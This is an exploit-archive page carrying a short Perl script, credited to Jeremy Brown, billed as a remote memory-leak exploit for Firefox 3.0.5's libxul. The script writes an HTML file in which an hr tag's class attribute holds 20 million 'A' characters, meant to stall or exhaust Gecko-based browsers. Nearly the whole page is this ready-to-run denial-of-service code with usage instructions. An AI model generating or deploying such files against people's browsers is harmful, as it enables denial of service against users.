Home / os / win10

mzff_libxul_ml.txt

Posted on 01 January 2009

#!/usr/bin/perl # mzff_libxul_ml.pl # Mozilla Firefox 3.0.5 (Libxul) Remote Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Debugging shows a near halt @ /usr/lib/xulrunner-x.x.x.x/libxul.so # All Gecko+Mozilla Browsers should be vulnerable $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html> "; } $head = "<html>" . " "; $trig = "<hr class = "" . "A" x 20000000 . "">" . " "; $foot = "</html>"; $data = $head . $trig . $foot; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit;

 

TOP